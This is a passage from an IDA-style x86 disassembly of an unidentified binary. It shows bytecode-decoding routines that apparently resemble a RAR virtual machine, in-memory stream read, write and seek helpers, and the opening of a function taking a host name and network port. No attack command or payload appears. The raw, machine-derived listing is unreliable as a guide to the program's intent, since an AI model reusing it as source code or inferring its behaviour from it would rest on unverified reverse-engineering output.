; DATA XREF: .text:off_9B4870�o
mov edx, [ebx+4] ; jumptable 009B4299 case 38
test edx, edx
jz short loc_9B47CE
movzx ecx, byte ptr [esi]
jmp short loc_9B47D0
; ---------------------------------------------------------------------------
loc_9B47CE: ; CODE XREF: sub_9B4244+583�j
mov ecx, [esi]
loc_9B47D0: ; CODE XREF: sub_9B4244+588�j
mov [ebp+var_8], ecx
mov ecx, [edi+24h]
and ecx, 1
test edx, edx
jz short loc_9B47E2
movzx eax, byte ptr [eax]
jmp short loc_9B47E4
; ---------------------------------------------------------------------------
loc_9B47E2: ; CODE XREF: sub_9B4244+597�j
mov eax, [eax]
loc_9B47E4: ; CODE XREF: sub_9B4244+59C�j
mov edx, [ebp+var_8]
sub edx, eax
sub edx, ecx
jz short loc_9B47AE
cmp edx, [ebp+var_8]
jbe short loc_9B47B8
loc_9B47F2: ; CODE XREF: sub_9B4244+572�j
; sub_9B4244+578�j
xor ecx, ecx
inc ecx
loc_9B47F5: ; CODE XREF: sub_9B4244+57C�j
mov eax, edx
and eax, 80000000h
or eax, ecx
loc_9B47FE: ; CODE XREF: sub_9B4244+56D�j
mov [edi+24h], eax
cmp dword ptr [ebx+4], 0
loc_9B4805: ; CODE XREF: sub_9B4244+3C8�j
jz short loc_9B480B
mov [esi], dl
jmp short loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B480B: ; CODE XREF: sub_9B4244:loc_9B4805�j
mov [esi], edx
jmp short loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B480F: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [edi+20h] ; jumptable 009B4299 case 22
cmp ecx, 40000h
jnb short loc_9B4867
mov esi, [edi]
mov eax, ecx
and eax, 3FFFFh
mov eax, [eax+esi]
cmp eax, [ebp+arg_4]
jnb short loc_9B4867
dec [ebp+var_4]
cmp [ebp+var_4], 0
jle loc_9B426B
lea eax, [eax+eax*4]
add ecx, 4
lea ebx, [edx+eax*8]
mov [edi+20h], ecx
jmp short loc_9B4856
; ---------------------------------------------------------------------------
loc_9B4846: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+10h] ; jumptable 009B4299 case 54
mov eax, edi
call sub_9B3D50
loc_9B4850: ; CODE XREF: sub_9B4244+4F�j
; sub_9B4244+55�j ...
add ebx, 28h ; default
; jumptable 009B4299 case 39
dec [ebp+var_4]
loc_9B4856: ; CODE XREF: sub_9B4244+2AC�j
; sub_9B4244+313�j ...
cmp ebx, [ebp+var_10]
mov [ebp+var_8], ebx
jbe loc_9B4271
jmp loc_9B426B
; ---------------------------------------------------------------------------
loc_9B4867: ; CODE XREF: sub_9B4244+293�j
; sub_9B4244+2F7�j ...
xor eax, eax
inc eax
jmp loc_9B426D
sub_9B4244 endp
; ---------------------------------------------------------------------------
align 10h
off_9B4870 dd offset loc_9B42A0, offset loc_9B42BE, offset loc_9B4326
; DATA XREF: sub_9B4244+55�r
dd offset loc_9B4360, offset loc_9B43AA, offset loc_9B43B3 ; jump table for switch statement
dd offset loc_9B43BC, offset loc_9B43E4, offset loc_9B44D2
dd offset loc_9B4409, offset loc_9B4426, offset loc_9B4443
dd offset loc_9B4476, offset loc_9B44A4, offset loc_9B44AA
dd offset loc_9B44B0, offset loc_9B44B6, offset loc_9B44C2
dd offset loc_9B44C8, offset loc_9B44F5, offset loc_9B4500
dd offset loc_9B4518, offset loc_9B480F, offset loc_9B455C
dd offset loc_9B4575, offset loc_9B45AB, offset loc_9B45D1
dd offset loc_9B4611, offset loc_9B4655, offset loc_9B468B
dd offset loc_9B46B6, offset loc_9B46CF, offset loc_9B46ED
dd offset loc_9B46F5, offset loc_9B46FD, offset loc_9B472E
dd offset loc_9B474E, offset loc_9B4784, offset loc_9B47C2
dd offset loc_9B4850, offset loc_9B42B7, offset loc_9B42AE
dd offset loc_9B42F8, offset loc_9B431E, offset loc_9B434E
dd offset loc_9B4357, offset loc_9B4398, offset loc_9B43A1
dd offset loc_9B43D6, offset loc_9B43DD, offset loc_9B43FB
dd offset loc_9B4402, offset loc_9B4647, offset loc_9B464E
dd offset loc_9B4846
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B494C(int,size_t Size)
sub_9B494C proc near ; CODE XREF: sub_9B0681+53�p
arg_0 = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+Size]
push edi
mov edi, [ebp+arg_0]
push 1Ch ; Size
lea eax, [esi+24h]
push eax ; Src
lea eax, [edi+4]
push eax ; Dst
call memcpy
mov eax, [esi+18h]
mov ebx, 2000h
add esp, 0Ch
cmp eax, ebx
mov [ebp+Size], eax
jl short loc_9B497C
mov [ebp+Size], ebx
loc_9B497C: ; CODE XREF: sub_9B494C+2B�j
cmp [ebp+Size], 0
jz short loc_9B4998
push [ebp+Size] ; Size
mov eax, [edi]
push dword ptr [esi+0Ch] ; Src
add eax, 3C000h
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B4998: ; CODE XREF: sub_9B494C+34�j
mov ecx, [ebp+Size]
mov eax, [esi+1Ch]
sub ebx, ecx
cmp eax, ebx
jb short loc_9B49A6
mov eax, ebx
loc_9B49A6: ; CODE XREF: sub_9B494C+56�j
test eax, eax
jz short loc_9B49C0
push eax ; Size
mov eax, [edi]
push dword ptr [esi+10h] ; Src
lea eax, [eax+ecx+3C000h]
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B49C0: ; CODE XREF: sub_9B494C+5C�j
and dword ptr [edi+24h], 0
mov dword ptr [edi+20h], 40000h
mov eax, [esi+8]
test eax, eax
mov ebx, eax
jnz short loc_9B49D6
mov ebx, [esi]
loc_9B49D6: ; CODE XREF: sub_9B494C+86�j
test ebx, ebx
jz loc_9B4A69
push dword ptr [esi+20h]
push ebx
call sub_9B4244
test eax, eax
pop ecx
pop ecx
jnz short loc_9B49F3
mov dword ptr [ebx], 16h
loc_9B49F3: ; CODE XREF: sub_9B494C+9F�j
mov edx, [edi]
mov ecx, [edx+3C020h]
mov eax, [edx+3C01Ch]
mov ebx, 3FFFFh
and ecx, ebx
and eax, ebx
lea ebx, [eax+ecx]
cmp ebx, 40000h
jb short loc_9B4A19
xor eax, eax
xor ecx, ecx
loc_9B4A19: ; CODE XREF: sub_9B494C+C7�j
mov [esi+40h], eax
mov eax, [esi+0Ch]
add edx, ecx
test eax, eax
mov [esi+14h], edx
jz short loc_9B4A38
push eax ; Memory
call free
and dword ptr [esi+0Ch], 0
and dword ptr [esi+18h], 0
pop ecx
loc_9B4A38: ; CODE XREF: sub_9B494C+DA�j
mov eax, [edi]
mov ebx, [eax+3C030h]
mov eax, 2000h
cmp ebx, eax
jb short loc_9B4A4B
mov ebx, eax
loc_9B4A4B: ; CODE XREF: sub_9B494C+FB�j
test ebx, ebx
jz short loc_9B4A83
lea eax, [ebx+40h]
add [esi+18h], eax
push dword ptr [esi+18h] ; NewSize
push dword ptr [esi+0Ch] ; Memory
call sub_9B2565
test eax, eax
pop ecx
pop ecx
mov [esi+0Ch], eax
jnz short loc_9B4A6D
loc_9B4A69: ; CODE XREF: sub_9B494C+8C�j
xor eax, eax
jmp short loc_9B4A86
; ---------------------------------------------------------------------------
loc_9B4A6D: ; CODE XREF: sub_9B494C+11B�j
mov ecx, [edi]
add ebx, 40h
push ebx ; Size
add ecx, 3C000h
push ecx ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B4A83: ; CODE XREF: sub_9B494C+101�j
xor eax, eax
inc eax
loc_9B4A86: ; CODE XREF: sub_9B494C+11F�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9B494C endp
; =============== S U B R O U T I N E =======================================
sub_9B4A8B proc near ; CODE XREF: sub_9B4C4B+20D�p
; sub_9B4C4B+222�p
arg_0 = dword ptr 4
push esi
call sub_9B3A73
test ah, ah
pop ecx
jns short loc_9B4AB1
and dword ptr [edi+4], 0
shr eax, 0Ch
and eax, 7
mov [edi+8], eax
lea eax, [ebx+eax*4+4]
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 4
jmp short loc_9B4AD5
; ---------------------------------------------------------------------------
loc_9B4AB1: ; CODE XREF: sub_9B4A8B+9�j
test ah, 0C0h
jnz short loc_9B4B02
cmp [esp+arg_0], 0
mov dword ptr [edi+4], 1
jz short loc_9B4AE4
shr eax, 6
and eax, 0FFh
mov [edi+8], eax
mov eax, [esi+0Ch]
add eax, 0Ah
loc_9B4AD5: ; CODE XREF: sub_9B4A8B+24�j
; sub_9B4A8B+9C�j
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
mov [esi+0Ch], eax
retn
; ---------------------------------------------------------------------------
loc_9B4AE4: ; CODE XREF: sub_9B4A8B+37�j
mov eax, [esi+0Ch]
inc eax
inc eax
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
push esi
mov [esi+0Ch], eax
call sub_9B3AA1
mov [edi+8], eax
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B4B02: ; CODE XREF: sub_9B4A8B+29�j
test ah, 20h
mov dword ptr [edi+4], 2
jnz short loc_9B4B29
and dword ptr [edi+0Ch], 0
shr eax, 0Ah
and eax, 7
mov [edi+8], eax
lea eax, [ebx+eax*4+4]
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 6
jmp short loc_9B4AD5
; ---------------------------------------------------------------------------
loc_9B4B29: ; CODE XREF: sub_9B4A8B+81�j
test ah, 10h
jnz short loc_9B4B45
shr eax, 9
and eax, 7
mov [edi+8], eax
lea eax, [ebx+eax*4+4]
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 7
jmp short loc_9B4B4F
; ---------------------------------------------------------------------------
loc_9B4B45: ; CODE XREF: sub_9B4A8B+A1�j
and dword ptr [edi+8], 0
mov eax, [esi+0Ch]
add eax, 4
loc_9B4B4F: ; CODE XREF: sub_9B4A8B+B8�j
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
push esi
mov [esi+0Ch], eax
call sub_9B3AA1
mov [edi+0Ch], eax
pop ecx
retn
sub_9B4A8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B4B68 proc near ; CODE XREF: sub_9B4C4B+2F2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ecx]
mov ecx, [ecx+20h]
test ecx, ecx
jle locret_9B4C49
push ebx
push esi
mov [ebp+var_4], 1
mov [ebp+var_8], ecx
push edi
loc_9B4B87: ; CODE XREF: sub_9B4B68+D8�j
mov esi, [eax]
mov edx, esi
sub edx, 0
jz loc_9B4C2B
dec edx
jz loc_9B4C1F
test byte_9BADC0[esi], 40h
jz loc_9B4C37
mov edi, [ebp+var_4]
cmp edi, ecx
jge short loc_9B4BCD
lea edx, [eax+28h]
loc_9B4BB2: ; CODE XREF: sub_9B4B68+63�j
mov ebx, [edx]
movzx ebx, byte_9BADC0[ebx]
test bl, 38h
jnz short loc_9B4C37
test bl, 40h
jnz short loc_9B4BCD
inc edi
add edx, 28h
cmp edi, ecx
jl short loc_9B4BB2
loc_9B4BCD: ; CODE XREF: sub_9B4B68+45�j
; sub_9B4B68+5B�j
mov edx, esi
dec edx
dec edx
jz short loc_9B4C13
dec edx
jz short loc_9B4C07
sub edx, 3
jz short loc_9B4BFB
dec edx
jz short loc_9B4BEF
sub edx, 14h
jnz short loc_9B4C37
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 35h
jmp short loc_9B4C35
; ---------------------------------------------------------------------------
loc_9B4BEF: ; CODE XREF: sub_9B4B68+74�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 33h
jmp short loc_9B4C35
; ---------------------------------------------------------------------------
loc_9B4BFB: ; CODE XREF: sub_9B4B68+71�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 31h
jmp short loc_9B4C35
; ---------------------------------------------------------------------------
loc_9B4C07: ; CODE XREF: sub_9B4B68+6C�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 2Fh
jmp short loc_9B4C35
; ---------------------------------------------------------------------------
loc_9B4C13: ; CODE XREF: sub_9B4B68+69�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 2Dh
jmp short loc_9B4C35
; ---------------------------------------------------------------------------
loc_9B4C1F: ; CODE XREF: sub_9B4B68+2D�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 2Bh
jmp short loc_9B4C35
; ---------------------------------------------------------------------------
loc_9B4C2B: ; CODE XREF: sub_9B4B68+26�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 29h
loc_9B4C35: ; CODE XREF: sub_9B4B68+85�j
; sub_9B4B68+91�j ...
mov [eax], edx
loc_9B4C37: ; CODE XREF: sub_9B4B68+3A�j
; sub_9B4B68+56�j ...
add eax, 28h
inc [ebp+var_4]
dec [ebp+var_8]
jnz loc_9B4B87
pop edi
pop esi
pop ebx
locret_9B4C49: ; CODE XREF: sub_9B4B68+C�j
leave
retn
sub_9B4B68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4C4B(int,int,void *Src,int,int)
sub_9B4C4B proc near ; CODE XREF: sub_9B0E04+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_C]
push esi
mov esi, [ebp+arg_4]
and dword ptr [esi+0Ch], 0
and dword ptr [esi+8], 0
mov eax, 8000h
cmp ebx, eax
push edi
jge short loc_9B4C6B
mov eax, ebx
loc_9B4C6B: ; CODE XREF: sub_9B4C4B+1C�j
mov edi, [ebp+Src]
push eax ; Size
push edi ; Src
push dword ptr [esi] ; Dst
call memcpy
xor eax, eax
inc eax
add esp, 0Ch
xor cl, cl
cmp ebx, eax
jle short loc_9B4C8B
loc_9B4C83: ; CODE XREF: sub_9B4C4B+3E�j
xor cl, [eax+edi]
inc eax
cmp eax, ebx
jl short loc_9B4C83
loc_9B4C8B: ; CODE XREF: sub_9B4C4B+36�j
mov eax, [esi+0Ch]
mov ebx, [ebp+arg_10]
add eax, 8
mov edx, eax
sar edx, 3
add [esi+8], edx
and eax, 7
mov [esi+0Ch], eax
and dword ptr [ebx+20h], 0
cmp cl, [edi]
jnz loc_9B4ED4
push edi
mov edi, [ebp+arg_C]
call sub_9B3BA1
mov edi, eax
test edi, edi
pop ecx
jz short loc_9B4CF8
push 1
push ebx
call sub_9B2420
mov edx, [ebx]
pop ecx
pop ecx
mov ecx, [ebx+20h]
lea eax, [ecx+ecx*4]
lea eax, [edx+eax*8]
inc ecx
and [ebp+arg_C], 0
mov [ebx+20h], ecx
lea ecx, [eax+10h]
mov [ecx], edi
mov [eax+8], ecx
lea ecx, [eax+20h]
push 3
mov [eax+18h], ecx
pop ecx
mov dword ptr [eax], 36h
mov [eax+1Ch], ecx
mov [eax+0Ch], ecx
loc_9B4CF8: ; CODE XREF: sub_9B4C4B+71�j
push esi
call sub_9B3A73
pop ecx
mov ecx, [esi+0Ch]
inc ecx
mov edx, ecx
sar edx, 3
add [esi+8], edx
and ecx, 7
test ah, ah
mov [esi+0Ch], ecx
jns loc_9B4EC8
push esi
call sub_9B3AA1
mov edi, eax
inc edi
push edi ; Size
mov [ebp+Src], edi
call sub_9B254A
test eax, eax
pop ecx
pop ecx
mov [ebx+10h], eax
jz short loc_9B4D9F
mov eax, [esi+8]
and [ebp+arg_4], 0
cmp eax, [ebp+arg_C]
jge loc_9B4EC8
jmp short loc_9B4D49
; ---------------------------------------------------------------------------
loc_9B4D46: ; CODE XREF: sub_9B4C4B+14D�j
mov edi, [ebp+Src]
loc_9B4D49: ; CODE XREF: sub_9B4C4B+F9�j
cmp [ebp+arg_4], edi
jge loc_9B4EC8
inc dword ptr [ebx+1Ch]
push dword ptr [ebx+1Ch] ; NewSize
push dword ptr [ebx+10h] ; Memory
call sub_9B2565
mov edi, eax
test edi, edi
pop ecx
pop ecx
mov [ebx+10h], edi
jz short loc_9B4D9F
push esi
call sub_9B3A73
shr eax, 8
pop ecx
mov ecx, [ebp+arg_4]
mov [edi+ecx], al
mov eax, [esi+0Ch]
add eax, 8
mov ecx, eax
and eax, 7
sar ecx, 3
add [esi+8], ecx
inc [ebp+arg_4]
mov [esi+0Ch], eax
mov eax, [ebp+arg_C]
cmp [esi+8], eax
jl short loc_9B4D46
jmp loc_9B4EC8
; ---------------------------------------------------------------------------
loc_9B4D9F: ; CODE XREF: sub_9B4C4B+E7�j
; sub_9B4C4B+11E�j
xor eax, eax
jmp loc_9B4F45
; ---------------------------------------------------------------------------
loc_9B4DA6: ; CODE XREF: sub_9B4C4B+283�j
push 1
push ebx
call sub_9B2420
mov eax, [ebx+20h]
mov ecx, [ebx]
lea eax, [eax+eax*4]
lea edi, [ecx+eax*8]
push esi
mov [ebp+arg_4], edi
call sub_9B3A73
add esp, 0Ch
test ah, ah
js short loc_9B4DD6
shr eax, 0Ch
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 4
jmp short loc_9B4DE4
; ---------------------------------------------------------------------------
loc_9B4DD6: ; CODE XREF: sub_9B4C4B+17C�j
shr eax, 0Ah
sub eax, 18h
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 6
loc_9B4DE4: ; CODE XREF: sub_9B4C4B+189�j
mov ecx, eax
and eax, 7
sar ecx, 3
add [esi+8], ecx
mov [esi+0Ch], eax
mov eax, [edi]
test byte_9BADC0[eax], 4
jz short loc_9B4E1E
push esi
call sub_9B3A73
shr eax, 0Fh
mov [edi+4], eax
mov eax, [esi+0Ch]
inc eax
pop ecx
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
mov [esi+0Ch], eax
jmp short loc_9B4E22
; ---------------------------------------------------------------------------
loc_9B4E1E: ; CODE XREF: sub_9B4C4B+1B0�j
and dword ptr [edi+4], 0
loc_9B4E22: ; CODE XREF: sub_9B4C4B+1D1�j
mov ecx, [edi]
push 3
pop eax
mov [edi+1Ch], eax
mov [edi+0Ch], eax
movzx ecx, byte_9BADC0[ecx]
and ecx, eax
lea eax, [edi+18h]
mov [ebp+var_4], eax
mov dword ptr [eax], 0
lea eax, [edi+8]
mov [ebp+Src], ecx
mov dword ptr [eax], 0
jle short loc_9B4EC5
push dword ptr [edi+4]
mov ebx, [ebp+arg_0]
mov edi, eax
call sub_9B4A8B
cmp [ebp+Src], 2
pop ecx
jnz short loc_9B4E75
mov eax, [ebp+arg_4]
push dword ptr [eax+4]
mov edi, [ebp+var_4]
call sub_9B4A8B
pop ecx
jmp short loc_9B4EC2
; ---------------------------------------------------------------------------
loc_9B4E75: ; CODE XREF: sub_9B4C4B+217�j
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+0Ch], 1
jnz short loc_9B4EC2
mov eax, [ecx]
test byte_9BADC0[eax], 18h
jz short loc_9B4EC2
mov eax, [ecx+10h]
mov edx, 100h
cmp eax, edx
jl short loc_9B4E99
sub eax, edx
jmp short loc_9B4EBF
; ---------------------------------------------------------------------------
loc_9B4E99: ; CODE XREF: sub_9B4C4B+248�j
cmp eax, 88h
jl short loc_9B4EA7
sub eax, 108h
jmp short loc_9B4EB9
; ---------------------------------------------------------------------------
loc_9B4EA7: ; CODE XREF: sub_9B4C4B+253�j
cmp eax, 10h
jl short loc_9B4EB1
sub eax, 8
jmp short loc_9B4EB9
; ---------------------------------------------------------------------------
loc_9B4EB1: ; CODE XREF: sub_9B4C4B+25F�j
cmp eax, 8
jl short loc_9B4EB9
sub eax, 10h
loc_9B4EB9: ; CODE XREF: sub_9B4C4B+25A�j
; sub_9B4C4B+264�j ...
mov edx, [ebp+arg_10]
add eax, [edx+20h]
loc_9B4EBF: ; CODE XREF: sub_9B4C4B+24C�j
mov [ecx+10h], eax
loc_9B4EC2: ; CODE XREF: sub_9B4C4B+228�j
; sub_9B4C4B+231�j ...
mov ebx, [ebp+arg_10]
loc_9B4EC5: ; CODE XREF: sub_9B4C4B+203�j
inc dword ptr [ebx+20h]
loc_9B4EC8: ; CODE XREF: sub_9B4C4B+C8�j
; sub_9B4C4B+F3�j ...
mov eax, [ebp+arg_C]
cmp [esi+8], eax
jl loc_9B4DA6
loc_9B4ED4: ; CODE XREF: sub_9B4C4B+5D�j
push 1
push ebx
call sub_9B2420
mov edx, [ebx]
pop ecx
pop ecx
mov ecx, [ebx+20h]
lea eax, [ecx+ecx*4]
lea eax, [edx+eax*8]
inc ecx
mov [ebx+20h], ecx
lea ecx, [eax+10h]
mov [eax+8], ecx
lea ecx, [eax+20h]
mov [eax+18h], ecx
push 3
pop ecx
mov [eax+1Ch], ecx
mov [eax+0Ch], ecx
xor edx, edx
mov dword ptr [eax], 16h
xor ecx, ecx
cmp [ebx+20h], edx
jle short loc_9B4F36
xor esi, esi
loc_9B4F13: ; CODE XREF: sub_9B4C4B+2E9�j
mov eax, [ebx]
add eax, esi
cmp [eax+8], edx
jnz short loc_9B4F22
lea edi, [eax+10h]
mov [eax+8], edi
loc_9B4F22: ; CODE XREF: sub_9B4C4B+2CF�j
cmp [eax+18h], edx
jnz short loc_9B4F2D
lea edi, [eax+20h]
mov [eax+18h], edi
loc_9B4F2D: ; CODE XREF: sub_9B4C4B+2DA�j
inc ecx
add esi, 28h
cmp ecx, [ebx+20h]
jl short loc_9B4F13
loc_9B4F36: ; CODE XREF: sub_9B4C4B+2C4�j
cmp [ebp+arg_C], edx
jz short loc_9B4F42
mov ecx, ebx
call sub_9B4B68
loc_9B4F42: ; CODE XREF: sub_9B4C4B+2EE�j
xor eax, eax
inc eax
loc_9B4F45: ; CODE XREF: sub_9B4C4B+156�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B4C4B endp
; =============== S U B R O U T I N E =======================================
sub_9B4F4A proc near ; CODE XREF: sub_9B02F5+8D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, dword_9BB318
mov [eax], ecx
mov eax, dword_9BB31C
retn
sub_9B4F4A endp
; =============== S U B R O U T I N E =======================================
sub_9B4F5C proc near ; CODE XREF: sub_9B239F+11�p
; sub_9B50DB+D�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 200200h
jnz short loc_9B4F81
xor eax, eax
cmp dword_9BB31C, eax
jz short loc_9B4F9F
mov dword_9BB31C, eax
mov dword_9BB318, eax
mov dword_9BB320, eax
jmp short loc_9B4F9C
; ---------------------------------------------------------------------------
loc_9B4F81: ; CODE XREF: sub_9B4F5C+8�j
cmp [esp+arg_0], 100100h
jnz short loc_9B4F9F
xor eax, eax
mov dword_9BB324, eax
mov dword_9BB328, eax
mov dword_9BB32C, eax
loc_9B4F9C: ; CODE XREF: sub_9B4F5C+23�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9B4F9F: ; CODE XREF: sub_9B4F5C+12�j
; sub_9B4F5C+2D�j
or eax, 0FFFFFFFFh
retn
sub_9B4F5C endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B4FA3(int,void *Dst,size_t Size)
sub_9B4FA3 proc near ; CODE XREF: sub_9B04E9+71�p
; sub_9B1DF0+21�p ...
arg_0 = dword ptr 4
Dst = dword ptr 8
Size = dword ptr 0Ch
cmp [esp+arg_0], 100100h
push esi
mov esi, [esp+4+Size]
jnz short loc_9B4FFA
mov edx, dword_9BB324
test edx, edx
jz short loc_9B4FFA
mov ecx, dword_9BB328
test ecx, ecx
jz short loc_9B4FFA
mov eax, dword_9BB32C
cmp eax, ecx
jl short loc_9B4FD3
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B4FD3: ; CODE XREF: sub_9B4FA3+2A�j
push edi
lea edi, [eax+esi]
cmp edi, ecx
pop edi
jle short loc_9B4FE0
sub ecx, eax
mov esi, ecx
loc_9B4FE0: ; CODE XREF: sub_9B4FA3+37�j
push esi ; Size
add eax, edx
push eax ; Src
push [esp+0Ch+Dst] ; Dst
call memcpy
add esp, 0Ch
add dword_9BB32C, esi
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B4FFA: ; CODE XREF: sub_9B4FA3+D�j
; sub_9B4FA3+17�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_9B4FA3 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B4FFF(int,void *Src,size_t Size)
sub_9B4FFF proc near ; CODE XREF: sub_9B05F5+D�p
; sub_9B1FC1+46�p
arg_0 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
cmp [esp+arg_0], 200200h
push esi
mov esi, [esp+4+Size]
jnz short loc_9B5056
mov edx, dword_9BB31C
test edx, edx
jz short loc_9B5056
mov ecx, dword_9BB318
test ecx, ecx
jz short loc_9B5056
mov eax, dword_9BB320
cmp eax, ecx
jl short loc_9B502F
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B502F: ; CODE XREF: sub_9B4FFF+2A�j
push edi
lea edi, [eax+esi]
cmp edi, ecx
pop edi
jle short loc_9B503C
sub ecx, eax
mov esi, ecx
loc_9B503C: ; CODE XREF: sub_9B4FFF+37�j
push esi ; Size
push [esp+8+Src] ; Src
add eax, edx
push eax ; Dst
call memcpy
add esp, 0Ch
add dword_9BB320, esi
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B5056: ; CODE XREF: sub_9B4FFF+D�j
; sub_9B4FFF+17�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_9B4FFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B505B proc near ; CODE XREF: sub_9B1E8C+F�p
; sub_9B1E8C+62�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_0], 100100h
jnz short loc_9B509A
cmp [ebp+arg_8], 0
jnz short loc_9B5072
mov eax, [ebp+arg_4]
jmp short loc_9B5093
; ---------------------------------------------------------------------------
loc_9B5072: ; CODE XREF: sub_9B505B+10�j
cmp [ebp+arg_8], 1
jnz short loc_9B5082
mov eax, dword_9BB32C
add eax, [ebp+arg_4]
jmp short loc_9B5093
; ---------------------------------------------------------------------------
loc_9B5082: ; CODE XREF: sub_9B505B+1B�j
cmp [ebp+arg_8], 2
jnz short loc_9B50D6
mov eax, [ebp+arg_4]
mov ecx, dword_9BB328
add eax, ecx
loc_9B5093: ; CODE XREF: sub_9B505B+15�j
; sub_9B505B+25�j
mov dword_9BB32C, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B509A: ; CODE XREF: sub_9B505B+A�j
cmp [ebp+arg_0], 200200h
jnz short loc_9B50D6
cmp [ebp+arg_8], 0
jnz short loc_9B50AE
mov eax, [ebp+arg_4]
jmp short loc_9B50CF
; ---------------------------------------------------------------------------
loc_9B50AE: ; CODE XREF: sub_9B505B+4C�j
cmp [ebp+arg_8], 1
jnz short loc_9B50BE
mov eax, dword_9BB320
add eax, [ebp+arg_4]
jmp short loc_9B50CF
; ---------------------------------------------------------------------------
loc_9B50BE: ; CODE XREF: sub_9B505B+57�j
cmp [ebp+arg_8], 2
jnz short loc_9B50D6
mov eax, [ebp+arg_4]
mov ecx, dword_9BB318
add eax, ecx
loc_9B50CF: ; CODE XREF: sub_9B505B+51�j
; sub_9B505B+61�j
mov dword_9BB320, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B50D6: ; CODE XREF: sub_9B505B+2B�j
; sub_9B505B+46�j ...
or eax, 0FFFFFFFFh
pop ebp
retn
sub_9B505B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B50DB(int,char,size_t Size)
sub_9B50DB proc near ; CODE XREF: sub_9B02F5+20�p
; sub_9B221A+A1�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
Size = dword ptr 0Ch
test [esp+arg_4], 2
push edi
jz short loc_9B5115
push 200200h
call sub_9B4F5C
mov edi, [esp+8+Size]
push edi ; Size
call malloc
test eax, eax
pop ecx
pop ecx
mov dword_9BB31C, eax
jz short loc_9B5110
mov dword_9BB318, edi
mov eax, 200200h
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B5110: ; CODE XREF: sub_9B50DB+26�j
or eax, 0FFFFFFFFh
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B5115: ; CODE XREF: sub_9B50DB+6�j
mov ecx, 100100h
push ecx
call sub_9B4F5C
mov eax, [esp+8+arg_0]
mov dword_9BB324, eax
mov eax, [esp+8+Size]
add esp, 4
mov dword_9BB328, eax
mov eax, ecx
pop edi
retn
sub_9B50DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5139(char *name,u_short netshort,int,int,char *Dest,size_t Count)
sub_9B5139 proc near ; CODE XREF: sub_9B5440+42�p
buf = byte ptr -834h
var_833 = byte ptr -833h
var_832 = byte ptr -832h
var_831 = byte ptr -831h
Src = byte ptr -830h
var_34 = byte ptr -34h
in = in_addr ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
Dst = byte ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
s = dword ptr -10h
var_C = dword ptr -0Ch
namelen = dword ptr -8
Memory = dword ptr -4
name = dword ptr 8
netshort = word ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
Count = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 834h
mov eax, [ebp+arg_C]
push edi
push [ebp+name] ; name
xor edi, edi
